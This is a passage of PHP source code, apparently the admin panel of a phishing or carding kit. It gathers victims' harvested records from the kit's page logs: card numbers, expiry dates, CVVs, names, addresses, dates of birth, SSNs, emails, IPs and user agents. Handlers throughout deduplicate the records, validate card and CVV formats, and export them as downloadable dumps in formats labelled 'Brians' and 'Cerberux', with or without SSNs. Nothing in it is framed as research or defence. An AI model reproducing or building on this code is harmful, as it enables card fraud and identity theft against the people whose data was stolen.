    $output .= !empty($briansData) ? implode("\n", $briansData) : "No data available.";
    
    echo $output;
    exit;
}

// ============================================
// REMOVE DUPLICATE + BRIANS SSN
// Clean log files AND export Brians format with SSN
// ============================================
if (isset($_GET['download']) && $_GET['download'] === 'cleanup_brians_ssn') {
    @set_time_limit(300);
    @ini_set('memory_limit', '256M');
    while (ob_get_level()) ob_end_clean();
    
    $allData = [];
    $cleanupStats = ['files' => 0, 'original' => 0, 'cleaned' => 0];
    
    foreach ($templateFolders as $folder => $name) {
        $logPaths = [
            $basePath . '/' . $folder . '/logs/data_webshop_logs.txt',
        ];
        
        foreach ($logPaths as $logPath) {
            if (file_exists($logPath) && filesize($logPath) > 0) {
                $lines = @file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
                if ($lines && count($lines) > 0) {
                    $cleanupStats['files']++;
                    $cleanupStats['original'] += count($lines);
                    
                    // Remove duplicates from file
                    $uniqueLines = [];
                    $seenHashes = [];
                    foreach ($lines as $line) {
                        $hash = md5(trim($line));
                        if (!isset($seenHashes[$hash])) {
                            $seenHashes[$hash] = true;
                            $uniqueLines[] = $line;
                        }
                    }
                    
                    // Save cleaned file
                    if (count($uniqueLines) < count($lines)) {
                        file_put_contents($logPath, implode(PHP_EOL, $uniqueLines) . PHP_EOL);
                    }
                    $cleanupStats['cleaned'] += count($uniqueLines);
                    
                    // Collect for export
                    foreach ($uniqueLines as $line) {
                        $clean = cleanWebshopLineDownload($line);
                        if ($clean) $allData[] = $clean;
                    }
                }
            }
        }
    }
    
    // Remove duplicates based on card number for export
    $uniqueCards = [];
    $seenCards = [];
    foreach ($allData as $line) {
        $parts = explode('|', $line);
        $cardNum = preg_replace('/\D/', '', $parts[0] ?? '');
        if (strlen($cardNum) >= 15 && !isset($seenCards[$cardNum])) {
            $seenCards[$cardNum] = true;
            $uniqueCards[] = $line;
        }
    }
    
    $briansData = [];
    
    foreach ($uniqueCards as $line) {
        $parts = explode('|', $line);
        
        $cardNumber = briansCleanField($parts[0] ?? '');
        $expMonth = briansCleanField($parts[1] ?? '');
        $expYear = briansCleanField($parts[2] ?? '');
        $cvv = briansCleanField($parts[3] ?? '');
        $name = briansCleanField($parts[4] ?? '');
        $address = briansCleanField($parts[5] ?? '');
        $city = briansCleanField($parts[6] ?? '');
        $state = briansCleanField($parts[7] ?? '');
        $zip = briansCleanField($parts[8] ?? '');
        $country = briansCleanField($parts[9] ?? '');
        $phone = briansCleanField($parts[10] ?? '');
        $dob = briansCleanField($parts[11] ?? '');
        $ssn = briansCleanField($parts[12] ?? ''); // Include SSN
        
        // Smart extract email, ip, ua (handles varying positions)
        $extracted = briansExtractEmailIpUa($parts);
        $email = briansCleanField($extracted['email']);
        $ip = briansCleanField($extracted['ip']);
        $ua = briansCleanField($extracted['ua']);
        
        $cardClean = preg_replace('/\D/', '', $cardNumber);
        if (strlen($cardClean) < 15 || strlen($cardClean) > 16) continue;
        
        $expDate = '';
        if (!empty($expMonth) && !empty($expYear)) {
            $expMonth = str_pad(preg_replace('/\D/', '', $expMonth), 2, '0', STR_PAD_LEFT);
            $expYear = preg_replace('/\D/', '', $expYear);
            if (strlen($expYear) === 4) $expYear = substr($expYear, -2);
            $expYear = str_pad($expYear, 2, '0', STR_PAD_LEFT);
            $expDate = $expMonth . '|' . $expYear;
        }
        
        $briansLine = implode('|', [
            $cardClean, $expDate, $cvv, $name, $address, $city, $state, $zip, $country, $phone, $email, $dob, $ssn, $ip, $ua
        ]) . '|';
        
        $briansData[] = $briansLine;
    }
    
    $briansData = array_unique($briansData);
    
    $filename = 'brians_cleaned_ssn_' . date('Y-m-d_H-i-s') . '.txt';
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    
    $output = "# Cleanup Stats: Files={$cleanupStats['files']}, Original={$cleanupStats['original']}, After Cleanup={$cleanupStats['cleaned']}, Removed=" . ($cleanupStats['original'] - $cleanupStats['cleaned']) . "\n";
    $output .= "card_number|exp_date|cvv|name|address|city|state|zip|country|phone|email|dob|ssn|ip|ua|\n";
    $output .= !empty($briansData) ? implode("\n", $briansData) : "No data available.";
    
    echo $output;
    exit;
}

// ============================================
// CERBERUX FORMAT - Cleanup + No SSN
// ============================================
if (isset($_GET['download']) && $_GET['download'] === 'cleanup_cerberux_no_ssn') {
    @set_time_limit(300);
    @ini_set('memory_limit', '256M');
    while (ob_get_level()) ob_end_clean();
    
    $allData = [];
    $cleanupStats = ['files' => 0, 'original' => 0, 'cleaned' => 0];
    
    foreach ($templateFolders as $folder => $name) {
        $logPaths = [
            $basePath . '/' . $folder . '/logs/data_webshop_logs.txt',
        ];
        
        foreach ($logPaths as $logPath) {
            if (file_exists($logPath) && filesize($logPath) > 0) {
                $lines = @file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
                if ($lines && count($lines) > 0) {
                    $cleanupStats['files']++;
                    $cleanupStats['original'] += count($lines);
                    
                    $uniqueLines = [];
                    $seenHashes = [];
                    foreach ($lines as $line) {
                        $hash = md5(trim($line));
                        if (!isset($seenHashes[$hash])) {
                            $seenHashes[$hash] = true;
                            $uniqueLines[] = $line;
                        }
                    }
                    
                    if (count($uniqueLines) < count($lines)) {
                        file_put_contents($logPath, implode(PHP_EOL, $uniqueLines) . PHP_EOL);
                    }
                    $cleanupStats['cleaned'] += count($uniqueLines);
                    
                    foreach ($uniqueLines as $line) {
                        $clean = cleanWebshopLineDownload($line);
                        if ($clean) $allData[] = $clean;
                    }
                }
            }
        }
    }
    
    $uniqueCards = [];
    $seenCards = [];
    foreach ($allData as $line) {
        $parts = explode('|', $line);
        $cardNum = preg_replace('/\D/', '', $parts[0] ?? '');
        if (strlen($cardNum) >= 15 && !isset($seenCards[$cardNum])) {
            $seenCards[$cardNum] = true;
            $uniqueCards[] = $line;
        }
    }
    
    $cerberuxData = [];
    
    foreach ($uniqueCards as $line) {
        $parts = explode('|', $line);
        
        $cardNumber = briansCleanField($parts[0] ?? '');
        $expMonth = briansCleanField($parts[1] ?? '');
        $expYear = briansCleanField($parts[2] ?? '');
        $cvv = briansCleanField($parts[3] ?? '');
        $name = briansCleanField($parts[4] ?? '');
        $address = briansCleanField($parts[5] ?? '');
        $city = briansCleanField($parts[6] ?? '');
        $state = briansCleanField($parts[7] ?? '');
        $zip = briansCleanField($parts[8] ?? '');
        $country = briansCleanField($parts[9] ?? '');
        $phone = briansCleanField($parts[10] ?? '');
        $dob = briansCleanField($parts[11] ?? '');
        
        $extracted = briansExtractEmailIpUa($parts);
        $email = briansCleanField($extracted['email']);
        $ip = briansCleanField($extracted['ip']);
        $ua = briansCleanField($extracted['ua']);
        
        $cardClean = preg_replace('/\D/', '', $cardNumber);
        if (strlen($cardClean) < 15 || strlen($cardClean) > 16) continue;
        
        $cerberuxLine = implode('|', [
            $cardClean, $expMonth, $expYear, $cvv, $name, $address, $city, $state, $zip, $country, $phone, $dob, '', $email, $ip, $ua
        ]) . '|';
        
        $cerberuxData[] = $cerberuxLine;
    }
    
    $cerberuxData = array_unique($cerberuxData);
    
    $filename = 'cerberux_cleaned_no_ssn_' . date('Y-m-d_H-i-s') . '.txt';
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    
    $output = "# Cleanup Stats: Files={$cleanupStats['files']}, Original={$cleanupStats['original']}, After Cleanup={$cleanupStats['cleaned']}, Removed=" . ($cleanupStats['original'] - $cleanupStats['cleaned']) . "\n";
    $output .= "card|mm|yy|cvv|name|address|city|state|zip|country|phone|dob|ssn|email|ip|ua|\n";
    $output .= !empty($cerberuxData) ? implode("\n", $cerberuxData) : "No data available.";
    
    echo $output;
    exit;
}

// ============================================
// CERBERUX FORMAT - Cleanup + With SSN
// ============================================
if (isset($_GET['download']) && $_GET['download'] === 'cleanup_cerberux_ssn') {
    @set_time_limit(300);
    @ini_set('memory_limit', '256M');
    while (ob_get_level()) ob_end_clean();
    
    $allData = [];
    $cleanupStats = ['files' => 0, 'original' => 0, 'cleaned' => 0];
    
    foreach ($templateFolders as $folder => $name) {
        $logPaths = [
            $basePath . '/' . $folder . '/logs/data_webshop_logs.txt',
        ];
        
        foreach ($logPaths as $logPath) {
            if (file_exists($logPath) && filesize($logPath) > 0) {
                $lines = @file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
                if ($lines && count($lines) > 0) {
                    $cleanupStats['files']++;
                    $cleanupStats['original'] += count($lines);
                    
                    $uniqueLines = [];
                    $seenHashes = [];
                    foreach ($lines as $line) {
                        $hash = md5(trim($line));
                        if (!isset($seenHashes[$hash])) {
                            $seenHashes[$hash] = true;
                            $uniqueLines[] = $line;
                        }
                    }
                    
                    if (count($uniqueLines) < count($lines)) {
                        file_put_contents($logPath, implode(PHP_EOL, $uniqueLines) . PHP_EOL);
                    }
                    $cleanupStats['cleaned'] += count($uniqueLines);
                    
                    foreach ($uniqueLines as $line) {
                        $clean = cleanWebshopLineDownload($line);
                        if ($clean) $allData[] = $clean;
                    }
                }
            }
        }
    }
    
    $uniqueCards = [];
    $seenCards = [];
    foreach ($allData as $line) {
        $parts = explode('|', $line);
        $cardNum = preg_replace('/\D/', '', $parts[0] ?? '');
        if (strlen($cardNum) >= 15 && !isset($seenCards[$cardNum])) {
            $seenCards[$cardNum] = true;
            $uniqueCards[] = $line;
        }
    }
    
    $cerberuxData = [];
    
    foreach ($uniqueCards as $line) {
        $parts = explode('|', $line);
        
        $cardNumber = briansCleanField($parts[0] ?? '');
        $expMonth = briansCleanField($parts[1] ?? '');
        $expYear = briansCleanField($parts[2] ?? '');
        $cvv = briansCleanField($parts[3] ?? '');
        $name = briansCleanField($parts[4] ?? '');
        $address = briansCleanField($parts[5] ?? '');
        $city = briansCleanField($parts[6] ?? '');
        $state = briansCleanField($parts[7] ?? '');
        $zip = briansCleanField($parts[8] ?? '');
        $country = briansCleanField($parts[9] ?? '');
        $phone = briansCleanField($parts[10] ?? '');
        $dob = briansCleanField($parts[11] ?? '');
        $ssn = briansCleanField($parts[12] ?? '');
        
        $extracted = briansExtractEmailIpUa($parts);
        $email = briansCleanField($extracted['email']);
        $ip = briansCleanField($extracted['ip']);
        $ua = briansCleanField($extracted['ua']);
        
        $cardClean = preg_replace('/\D/', '', $cardNumber);
        if (strlen($cardClean) < 15 || strlen($cardClean) > 16) continue;
        
        $cerberuxLine = implode('|', [
            $cardClean, $expMonth, $expYear, $cvv, $name, $address, $city, $state, $zip, $country, $phone, $dob, $ssn, $email, $ip, $ua
        ]) . '|';
        
        $cerberuxData[] = $cerberuxLine;
    }
    
    $cerberuxData = array_unique($cerberuxData);
    
    $filename = 'cerberux_cleaned_ssn_' . date('Y-m-d_H-i-s') . '.txt';
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    
    $output = "# Cleanup Stats: Files={$cleanupStats['files']}, Original={$cleanupStats['original']}, After Cleanup={$cleanupStats['cleaned']}, Removed=" . ($cleanupStats['original'] - $cleanupStats['cleaned']) . "\n";
    $output .= "card|mm|yy|cvv|name|address|city|state|zip|country|phone|dob|ssn||email|ip|ua\n";
    $output .= !empty($cerberuxData) ? implode("\n", $cerberuxData) : "No data available.";
    
    echo $output;
    exit;
}

// ============================================
// CERBERUX FORMAT - Clean (Full cleanup: remove dup + timestamp + format rusak + || kosong)
// ============================================
if (isset($_GET['download']) && $_GET['download'] === 'cerberux_clean') {
    @set_time_limit(300);
    @ini_set('memory_limit', '256M');
    while (ob_get_level()) ob_end_clean();
    
    $allData = [];
    $cleanupStats = ['files' => 0, 'original' => 0, 'cleaned' => 0, 'timestamp' => 0, 'invalid' => 0];
    
    // Deep clean function
    $deepCleanLine = function($line) use (&$cleanupStats) {
        $line = trim($line);
        if (empty($line)) return null;
        
        if (stripos($line, 'Card Submitted') !== false) {
            $cleanupStats['invalid']++;
            return null;
        }
        
        if (preg_match('/^\d{4}-\d{2}-\d{2}\s*\d{2}:\d{2}:\d{2}\|/', $line)) {
            $cleanupStats['timestamp']++;
            return null;
        }
        if (preg_match('/^\d{4}-\d{2}-\d{2}\|/', $line)) {
            $cleanupStats['timestamp']++;
            return null;
        }
        
        if (preg_match('/^[a-zA-Z0-9][a-zA-Z0-9\-\.]+\.[a-zA-Z]{2,}\|(.+)$/', $line, $matches)) {
            $line = $matches[1];
        }
        
        if (strpos($line, '|') === 0) {
            $line = substr($line, 1);
        }
        
        $parts = explode('|', $line);
        $cardNum = preg_replace('/\D/', '', $parts[0] ?? '');
        if (strlen($cardNum) < 15 || strlen($cardNum) > 16) {
            $cleanupStats['invalid']++;
            return null;
        }
        
        return $line;
    };
    
    foreach ($templateFolders as $folder => $name) {
        $logPaths = [
            $basePath . '/' . $folder . '/logs/data_webshop_logs.txt',
        ];
        
        foreach ($logPaths as $logPath) {
            if (file_exists($logPath) && filesize($logPath) > 0) {
                $lines = @file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
                if ($lines && count($lines) > 0) {
                    $cleanupStats['files']++;
                    $cleanupStats['original'] += count($lines);
                    
                    // Deep clean first
                    $cleanedLines = [];
                    foreach ($lines as $line) {
                        $cleaned = $deepCleanLine($line);
                        if ($cleaned) $cleanedLines[] = $cleaned;
                    }
                    
                    // Remove duplicates
                    $uniqueLines = [];
                    $seenHashes = [];
                    foreach ($cleanedLines as $line) {
                        $hash = md5(trim($line));
                        if (!isset($seenHashes[$hash])) {
                            $seenHashes[$hash] = true;
                            $uniqueLines[] = $line;
                        }
                    }
                    
                    if (count($uniqueLines) < count($lines)) {
                        file_put_contents($logPath, implode(PHP_EOL, $uniqueLines) . PHP_EOL);
                    }
                    $cleanupStats['cleaned'] += count($uniqueLines);
                    
                    foreach ($uniqueLines as $line) {
                        $clean = cleanWebshopLineDownload($line);
                        if ($clean) $allData[] = $clean;
                    }
                }
            }
        }
    }
    
    $uniqueCards = [];
    $seenCards = [];
    foreach ($allData as $line) {
        $parts = explode('|', $line);
        $cardNum = preg_replace('/\D/', '', $parts[0] ?? '');
        if (strlen($cardNum) >= 15 && !isset($seenCards[$cardNum])) {
            $seenCards[$cardNum] = true;
            $uniqueCards[] = $line;
        }
    }
    
    $cerberuxData = [];
    
    foreach ($uniqueCards as $line) {
        $parts = explode('|', $line);
        
        $cardNumber = briansCleanField($parts[0] ?? '');
        $expMonth = briansCleanField($parts[1] ?? '');
        $expYear = briansCleanField($parts[2] ?? '');
        $cvv = briansCleanField($parts[3] ?? '');
        $name = briansCleanField($parts[4] ?? '');
        $address = briansCleanField($parts[5] ?? '');
        $city = briansCleanField($parts[6] ?? '');
        $state = briansCleanField($parts[7] ?? '');
        $zip = briansCleanField($parts[8] ?? '');
        $country = briansCleanField($parts[9] ?? '');
        $phone = briansCleanField($parts[10] ?? '');
        $dob = briansCleanField($parts[11] ?? '');
        
        $extracted = briansExtractEmailIpUa($parts);
        $email = briansCleanField($extracted['email']);
        $ip = briansCleanField($extracted['ip']);
        $ua = briansCleanField($extracted['ua']);
        
        $cardClean = preg_replace('/\D/', '', $cardNumber);
        if (strlen($cardClean) < 15 || strlen($cardClean) > 16) continue;
        
        // Cerberux format without SSN: card|mm|yy|cvv|name|address|city|state|zip|country|phone|dob||email|ip|ua|
        $cerberuxLine = implode('|', [
            $cardClean, $expMonth, $expYear, $cvv, $name, $address, $city, $state, $zip, $country, $phone, $dob, '', $email, $ip, $ua
        ]) . '|';
        
        // Keep empty fields as || - maintains consistent field positions
        $cerberuxLine = rtrim($cerberuxLine, '|') . '|';
        
        $cerberuxData[] = $cerberuxLine;
    }
    
    $cerberuxData = array_unique($cerberuxData);
    
    $filename = 'cerberux_clean_' . date('Y-m-d_H-i-s') . '.txt';
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    
    $output = "# Full Cleanup: Files={$cleanupStats['files']}, Original={$cleanupStats['original']}, Clean={$cleanupStats['cleaned']}, Timestamp={$cleanupStats['timestamp']}, Invalid={$cleanupStats['invalid']}\n";
    $output .= "# Format: card|mm|yy|cvv|name|address|city|state|zip|country|phone|dob|email|ip|ua (no SSN, empty || removed)\n";
    $output .= !empty($cerberuxData) ? implode("\n", $cerberuxData) : "No data available.";
    
    echo $output;
    exit;
}

// ============================================
// CERBERUX FORMAT - Clean with SSN (Full cleanup + Export dengan SSN)
// ============================================
if (isset($_GET['download']) && $_GET['download'] === 'cerberux_clean_ssn') {
    @set_time_limit(300);
    @ini_set('memory_limit', '256M');
    while (ob_get_level()) ob_end_clean();
    
    $allData = [];
    $cleanupStats = ['files' => 0, 'original' => 0, 'cleaned' => 0, 'timestamp' => 0, 'invalid' => 0];
    
    $deepCleanLine = function($line) use (&$cleanupStats) {
        $line = trim($line);
        if (empty($line)) return null;
        
        if (stripos($line, 'Card Submitted') !== false) {
            $cleanupStats['invalid']++;
            return null;
        }
        
        if (preg_match('/^\d{4}-\d{2}-\d{2}\s*\d{2}:\d{2}:\d{2}\|/', $line)) {
            $cleanupStats['timestamp']++;
            return null;
        }
        if (preg_match('/^\d{4}-\d{2}-\d{2}\|/', $line)) {
            $cleanupStats['timestamp']++;
            return null;
        }
        
        if (preg_match('/^[a-zA-Z0-9][a-zA-Z0-9\-\.]+\.[a-zA-Z]{2,}\|(.+)$/', $line, $matches)) {
            $line = $matches[1];
        }
        
        if (strpos($line, '|') === 0) {
            $line = substr($line, 1);
        }
        
        $parts = explode('|', $line);
        $cardNum = preg_replace('/\D/', '', $parts[0] ?? '');
        if (strlen($cardNum) < 15 || strlen($cardNum) > 16) {
            $cleanupStats['invalid']++;
            return null;
        }
        
        return $line;
    };
    
    foreach ($templateFolders as $folder => $name) {
        $logPaths = [
            $basePath . '/' . $folder . '/logs/data_webshop_logs.txt',
        ];
        
        foreach ($logPaths as $logPath) {
            if (file_exists($logPath) && filesize($logPath) > 0) {
                $lines = @file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
                if ($lines && count($lines) > 0) {
                    $cleanupStats['files']++;
                    $cleanupStats['original'] += count($lines);
                    
                    $cleanedLines = [];
                    foreach ($lines as $line) {
                        $cleaned = $deepCleanLine($line);
                        if ($cleaned) $cleanedLines[] = $cleaned;
                    }
                    
                    $uniqueLines = [];
                    $seenHashes = [];
                    foreach ($cleanedLines as $line) {
                        $hash = md5(trim($line));
                        if (!isset($seenHashes[$hash])) {
                            $seenHashes[$hash] = true;
                            $uniqueLines[] = $line;
                        }
                    }
                    
                    if (count($uniqueLines) < count($lines)) {
                        file_put_contents($logPath, implode(PHP_EOL, $uniqueLines) . PHP_EOL);
                    }
                    $cleanupStats['cleaned'] += count($uniqueLines);
                    
                    foreach ($uniqueLines as $line) {
                        $clean = cleanWebshopLineDownload($line);
                        if ($clean) $allData[] = $clean;
                    }
                }
            }
        }
    }
    
    $uniqueCards = [];
    $seenCards = [];
    foreach ($allData as $line) {
        $parts = explode('|', $line);
        $cardNum = preg_replace('/\D/', '', $parts[0] ?? '');
        if (strlen($cardNum) >= 15 && !isset($seenCards[$cardNum])) {
            $seenCards[$cardNum] = true;
            $uniqueCards[] = $line;
        }
    }
    
    $cerberuxData = [];
    
    foreach ($uniqueCards as $line) {
        $parts = explode('|', $line);
        
        $cardNumber = briansCleanField($parts[0] ?? '');
        $expMonth = briansCleanField($parts[1] ?? '');
        $expYear = briansCleanField($parts[2] ?? '');
        $cvv = briansCleanField($parts[3] ?? '');
        $name = briansCleanField($parts[4] ?? '');
        $address = briansCleanField($parts[5] ?? '');
        $city = briansCleanField($parts[6] ?? '');
        $state = briansCleanField($parts[7] ?? '');
        $zip = briansCleanField($parts[8] ?? '');
        $country = briansCleanField($parts[9] ?? '');
        $phone = briansCleanField($parts[10] ?? '');
        $dob = briansCleanField($parts[11] ?? '');
        $ssn = briansCleanField($parts[12] ?? ''); // Include SSN
        
        $extracted = briansExtractEmailIpUa($parts);
        $email = briansCleanField($extracted['email']);
        $ip = briansCleanField($extracted['ip']);
        $ua = briansCleanField($extracted['ua']);
        
        $cardClean = preg_replace('/\D/', '', $cardNumber);
        if (strlen($cardClean) < 15 || strlen($cardClean) > 16) continue;
        
        // Cerberux format with SSN: card|mm|yy|cvv|name|address|city|state|zip|country|phone|dob|ssn|email|ip|ua|
        $cerberuxLine = implode('|', [
            $cardClean, $expMonth, $expYear, $cvv, $name, $address, $city, $state, $zip, $country, $phone, $dob, $ssn, $email, $ip, $ua
        ]) . '|';
        
        // Keep empty fields as || - maintains consistent field positions
        $cerberuxLine = rtrim($cerberuxLine, '|') . '|';
        
        $cerberuxData[] = $cerberuxLine;
    }
    
    $cerberuxData = array_unique($cerberuxData);
    
    $filename = 'cerberux_clean_ssn_' . date('Y-m-d_H-i-s') . '.txt';
    header('Content-Type: text/plain; charset=utf-8');
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    
    $output = "# Full Cleanup: Files={$cleanupStats['files']}, Original={$cleanupStats['original']}, Clean={$cleanupStats['cleaned']}, Timestamp={$cleanupStats['timestamp']}, Invalid={$cleanupStats['invalid']}\n";
    $output .= "# Format: card|mm|yy|cvv|name|address|city|state|zip|country|phone|dob|ssn|email|ip|ua (with SSN, empty || removed)\n";
    $output .= !empty($cerberuxData) ? implode("\n", $cerberuxData) : "No data available.";
    
    echo $output;
    exit;
}
} // end disabled old exports

// Handle Cleanup Duplicates (all template logs)
if (isset($_POST['cleanup_duplicates']) && $_POST['cleanup_duplicates'] === 'yes') {
    @set_time_limit(300);
    @ini_set('memory_limit', '256M');
    $totalResult = ['files_processed' => 0, 'original' => 0, 'unique' => 0, 'removed' => 0];
    
    foreach ($templateFolders as $folder => $name) {
        $logPaths = [
            $basePath . '/' . $folder . '/logs/data_webshop_logs.txt',
        ];
        
        foreach ($logPaths as $logPath) {
            if (!file_exists($logPath) || filesize($logPath) == 0) continue;
            
            $lines = file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
            if (empty($lines)) continue;
            
            $originalCount = count($lines);
            $uniqueLines = [];
            $seenHashes = [];
            
            foreach ($lines as $line) {
                $hash = md5(trim($line));
                if (!isset($seenHashes[$hash])) {
                    $seenHashes[$hash] = true;
                    $uniqueLines[] = $line;
                }
            }
            
            $removedCount = $originalCount - count($uniqueLines);
            
            if ($removedCount > 0) {
                @copy($logPath, $logPath . '.bak_' . date('Ymd_His'));
                file_put_contents($logPath, implode(PHP_EOL, $uniqueLines) . PHP_EOL);
            }
            
            $totalResult['files_processed']++;
            $totalResult['original'] += $originalCount;
            $totalResult['unique'] += count($uniqueLines);
            $totalResult['removed'] += $removedCount;
        }
    }
    
    header('Location: webshop.php?cleaned=1&files=' . $totalResult['files_processed'] . '&original=' . $totalResult['original'] . '&unique=' . $totalResult['unique'] . '&removed=' . $totalResult['removed']);
    exit;
}

// ============================================
// DEEP CLEANUP - Comprehensive cleanup + validation
// ============================================
if (isset($_POST['deep_cleanup']) && $_POST['deep_cleanup'] === 'yes') {
    @set_time_limit(300);
    @ini_set('memory_limit', '256M');
    $deepResult = [
        'files_processed' => 0,
        'original_total' => 0,
        'valid_total' => 0,
        'invalid_removed' => 0,
        'duplicates_removed' => 0,
        'domain_cleaned' => 0,
        'timestamp_removed' => 0,
        'card_submitted_removed' => 0,
    ];
    
    // Deep clean function
    $deepCleanLine = function($line) use (&$deepResult) {
        $line = trim($line);
        if (empty($line)) return null;
        
        // Remove "Card Submitted" entries
        if (stripos($line, 'Card Submitted') !== false) {
            $deepResult['card_submitted_removed']++;
            return null;
        }
        
        // Remove timestamp entries (e.g., 2024-01-15 12:30:45|...)
        if (preg_match('/^\d{4}-\d{2}-\d{2}\s*\d{2}:\d{2}:\d{2}\|/', $line)) {
            $deepResult['timestamp_removed']++;
            return null;
        }
        if (preg_match('/^\d{4}-\d{2}-\d{2}\|/', $line)) {
            $deepResult['timestamp_removed']++;
            return null;
        }
        
        // Remove domain prefix (e.g., example.com|..., domain.lazarus|...)
        if (preg_match('/^[a-zA-Z0-9][a-zA-Z0-9\-\.]+\.[a-zA-Z]{2,}\|(.+)$/', $line, $matches)) {
            $line = $matches[1];
            $deepResult['domain_cleaned']++;
        }
        
        // Fix Netflix format: remove leading pipe if line starts with |
        if (strpos($line, '|') === 0) {
            $line = substr($line, 1);
        }
        
        return $line;
    };
    
    // Validate CC format (min 10 fields: CC|MM|YY|CVV|Name|Addr|Addr2|City|State|Zip|...)
    $validateCCFormat = function($line) {
        // Fix Netflix format: remove leading pipe if line starts with |
        if (strpos($line, '|') === 0) {
            $line = substr($line, 1);
        }
        $parts = explode('|', $line);
        if (count($parts) < 10) return false;
        
        // Validate CC number (13-19 digits)
        $cc = preg_replace('/\D/', '', $parts[0]);
        if (strlen($cc) < 15 || strlen($cc) > 16) return false;
        
        // Validate MM (01-12)
        $mm = trim($parts[1]);
        if (!preg_match('/^(0[1-9]|1[0-2])$/', $mm)) return false;
        
        // Validate YY (2 digits)
        $yy = trim($parts[2]);
        if (!preg_match('/^\d{2}$/', $yy)) return false;
        
        // Validate CVV (3-4 digits)
        $cvv = trim($parts[3]);
        if (!preg_match('/^\d{3,4}$/', $cvv)) return false;
        
        return true;
    };
    
    // Process all template logs
    foreach ($templateFolders as $folder => $name) {
        $logPaths = [
            $basePath . '/' . $folder . '/logs/data_webshop_logs.txt',
        ];
        
        foreach ($logPaths as $logPath) {
            if (!file_exists($logPath) || filesize($logPath) == 0) continue;
            
            $lines = file($logPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
            if (empty($lines)) continue;
            
            $deepResult['files_processed']++;
            $deepResult['original_total'] += count($lines);
            
            // Create backup before cleanup
            @copy($logPath, $logPath . '.deep_bak_' . date('Ymd_His'));
            
            // Step 1: Clean lines (remove domain, timestamp, card submitted)
            $cleanedLines = [];
            foreach ($lines as $line) {
                $clean = $deepCleanLine($line);
                if ($clean !== null) {
                    $cleanedLines[] = $clean;
                }
            }
            
            // Step 2: Validate format (min 10 fields)
            $validLines = [];
            foreach ($cleanedLines as $line) {
                if ($validateCCFormat($line)) {
                    $validLines[] = $line;
                } else {
                    $deepResult['invalid_removed']++;
                }
            }
            
            // Step 3: Remove duplicates by CC+Exp+CVV key
            $uniqueLines = [];
            $seenKeys = [];
            foreach ($validLines as $line) {
                $parts = explode('|', $line);
                $cc = preg_replace('/\D/', '', $parts[0]);
                $mm = trim($parts[1]);
                $yy = trim($parts[2]);
                $cvv = trim($parts[3]);
                $uniqueKey = $cc . '|' . $mm . '|' . $yy . '|' . $cvv;
                
                if (!isset($seenKeys[$uniqueKey])) {
                    $seenKeys[$uniqueKey] = true;
                    $uniqueLines[] = $line;
                } else {
                    $deepResult['duplicates_removed']++;
                }
            }
            
            $deepResult['valid_total'] += count($uniqueLines);
            
            // Write cleaned data back
            if (count($uniqueLines) > 0) {
                file_put_contents($logPath, implode(PHP_EOL, $uniqueLines) . PHP_EOL);
            } else {
                // If no valid data, create empty file
                file_put_contents($logPath, '');
            }
        }
    }
    
    // Also process main webshop data file if exists (in config folder)
    $webshopPath = $basePath . '/config/webshop.txt';
    if (file_exists($webshopPath) && filesize($webshopPath) > 0) {
        $lines = file($webshopPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        if (!empty($lines)) {
            $deepResult['files_processed']++;
            $deepResult['original_total'] += count($lines);
            
            @copy($webshopPath, $webshopPath . '.deep_bak_' . date('Ymd_His'));
            
            $cleanedLines = [];
            foreach ($lines as $line) {
                $clean = $deepCleanLine($line);
                if ($clean !== null) {
                    $cleanedLines[] = $clean;
                }
            }
            
            $validLines = [];
            foreach ($cleanedLines as $line) {
                if ($validateCCFormat($line)) {
                    $validLines[] = $line;
                } else {
                    $deepResult['invalid_removed']++;
                }
            }
            
            $uniqueLines = [];
            $seenKeys = [];
            foreach ($validLines as $line) {
                $parts = explode('|', $line);
                $cc = preg_replace('/\D/', '', $parts[0]);
                $mm = trim($parts[1]);
                $yy = trim($parts[2]);
                $cvv = trim($parts[3]);
                $uniqueKey = $cc . '|' . $mm . '|' . $yy . '|' . $cvv;
                
                if (!isset($seenKeys[$uniqueKey])) {
                    $seenKeys[$uniqueKey] = true;
                    $uniqueLines[] = $line;
                } else {
                    $deepResult['duplicates_removed']++;
                }
            }
            
            $deepResult['valid_total'] += count($uniqueLines);
            file_put_contents($webshopPath, count($uniqueLines) > 0 ? implode(PHP_EOL, $uniqueLines) . PHP_EOL : '');
        }
    }
    
    $removedTotal = $deepResult['original_total'] - $deepResult['valid_total'];
    header('Location: webshop.php?deep_cleaned=1&files=' . $deepResult['files_processed'] . '&original=' . $deepResult['original_total'] . '&valid=' . $deepResult['valid_total'] . '&removed=' . $removedTotal . '&dups=' . $deepResult['duplicates_removed'] . '&domain=' . $deepResult['domain_cleaned'] . '&invalid=' . $deepResult['invalid_removed']);
    exit;
}

// ============================================
// CLEANUP WEBSHOP.TXT ONLY - Simple duplicate removal
// ============================================
if (isset($_POST['cleanup_webshop_only']) && $_POST['cleanup_webshop_only'] === 'yes') {
    @set_time_limit(300);
    @ini_set('memory_limit', '256M');
    $webshopPath = $basePath . '/config/webshop.txt';
    $result = ['original' => 0, 'unique' => 0, 'removed' => 0, 'backup' => ''];
    
    if (file_exists($webshopPath) && filesize($webshopPath) > 0) {
        $lines = file($webshopPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        if (!empty($lines)) {
            $result['original'] = count($lines);
            
            // Create backup
            $backupFile = $webshopPath . '.bak_' . date('Ymd_His');
            @copy($webshopPath, $backupFile);
            $result['backup'] = basename($backupFile);
            
            // Remove duplicates (keep first occurrence)
            $uniqueLines = [];
